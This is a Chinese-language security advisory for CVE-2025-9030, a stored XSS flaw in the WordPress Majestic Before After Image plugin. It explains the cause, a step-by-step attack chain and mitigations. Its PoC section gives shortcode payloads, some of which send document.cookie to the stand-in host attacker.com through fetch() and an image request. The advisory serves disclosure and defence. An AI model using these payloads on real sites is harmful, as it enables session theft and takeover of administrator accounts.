CVE-2025-9030 WordPress Majestic Before After Image插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-9030

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Majestic Before After Image插件

漏洞概述

CVE-2025-9030是WordPress的Majestic Before After Image插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Wordfence安全团队的安全研究员发现并报告，CVSS评分为5.4分，属于中危级别漏洞。

Majestic Before After Image是一款用于在WordPress网站上创建图片前后对比效果的插件，广泛应用于产品展示、设计作品展示等场景。该插件允许用户通过简码（shortcode）的方式在文章或页面中嵌入前后对比图片，并可以自定义前后图片的标签文字。

该漏洞存在于插件的版本2.0.1及以下版本中，影响插件的'before_label'（前标签）和'after_label'（后标签）两个参数。由于插件在处理用户输入时未对这些参数进行充分的输入清理（sanitization）和输出转义（escaping），导致恶意用户可以在这些参数中注入任意JavaScript代码。由于这些数据会被持久化存储到数据库中，当其他用户访问包含恶意代码的页面时，注入的脚本将在受害者浏览器中自动执行，从而实现窃取用户会话、劫持账户、篡改页面内容或执行其他恶意操作。

此漏洞的攻击前提是攻击者需要拥有Contributor（投稿者）级别及以上的WordPress账户权限。虽然这限制了一定的攻击范围，但在许多允许用户注册的WordPress网站上，投稿者账户的注册门槛较低，因此该漏洞仍具有较大的安全风险。

技术细节

该漏洞的根本原因在于Majestic Before After Image插件在处理简码参数时缺乏对用户输入的适当过滤和转义处理。

**漏洞原理：**
1. 插件注册了一个WordPress简码（如[majestic_before_after_image]），该简码接受多个参数，包括'before_label'和'after_label'。
2. 当贡献者或更高权限的用户在文章编辑器中插入该简码并设置自定义标签值时，这些值会被直接保存到文章内容中。
3. 插件在渲染前端页面时，直接将这些参数值输出到HTML中，没有进行HTML实体编码或JavaScript上下文转义。
4. 攻击者可以在标签参数中注入恶意JavaScript代码，例如：`<script>alert(document.cookie)</script>` 或 `<img src=x onerror=...>`。
5. 由于这些值被持久化存储（存储型XSS），每当任何用户访问包含该简码的文章页面时，恶意脚本都会执行。

**利用方式：**
1. 攻击者注册或利用已有的Contributor级别账户登录WordPress后台。
2. 创建新文章或编辑现有文章，在内容中插入Majestic Before After Image简码。
3. 在'before_label'或'after_label'参数中注入恶意JavaScript代码。
4. 发布文章后，任何访问该页面的用户（包括管理员）都会执行恶意脚本。
5. 攻击者可利用此漏洞窃取管理员Cookie、会话令牌，或执行其他恶意操作以进一步控制网站。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过注册或购买方式获得WordPress网站的Contributor（投稿者）级别账户权限。如果网站开放用户注册，注册即可获得该级别权限。

STEP 2

步骤2：登录WordPress后台

攻击者使用获取的Contributor账户凭据登录WordPress管理后台。

STEP 3

步骤3：创建恶意文章

攻击者创建新文章或编辑现有文章，在文章内容中插入Majestic Before After Image插件的简码，并在'before_label'和'after_label'参数中注入恶意JavaScript代码。

STEP 4

步骤4：发布文章

攻击者提交文章审核或直接发布（取决于Contributor权限的具体配置）。恶意代码随文章内容持久化存储到WordPress数据库中。

STEP 5

步骤5：触发XSS执行

当其他用户（包括管理员、编辑或其他访问者）浏览包含恶意简码的文章页面时，存储在标签参数中的恶意脚本将在其浏览器中自动执行。

STEP 6

步骤6：实施进一步攻击

恶意脚本可窃取用户会话Cookie、劫持账户、篡改页面内容、重定向到钓鱼网站，或利用管理员权限上传WebShell以完全控制网站。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-9030 -->
<!-- Inject this shortcode into a WordPress post as a Contributor-level user -->

[majestic-before-after-image
    before_image="1"
    after_image="2"
    before_label='"><script>alert(document.cookie)</script>'
    after_label='"><img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">'
]

<!-- Alternative PoC using event handlers -->
[majestic-before-after-image
    before_label="<img/src=x onerror=alert('XSS-Via-CVE-2025-9030')>"
    after_label="<svg onload=alert(1)>"
]

<!-- PoC for cookie stealing (requires attacker-controlled server) -->
[majestic-before-after-image
    before_label='"><script>var i=new Image();i.src="https://attacker.com/log?"+document.cookie;</script>'
]

影响范围

Majestic Before After Image <= 2.0.1

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）暂时停用Majestic Before After Image插件；2）限制Contributor级别用户的文章发布权限，将所有文章设置为待审核状态；3）部署Web应用防火墙规则，过滤包含恶意JavaScript代码的简码参数；4）在网站层面添加Content-Security-Policy响应头，限制内联脚本执行；5）定期检查已发布文章内容，清理可疑代码注入。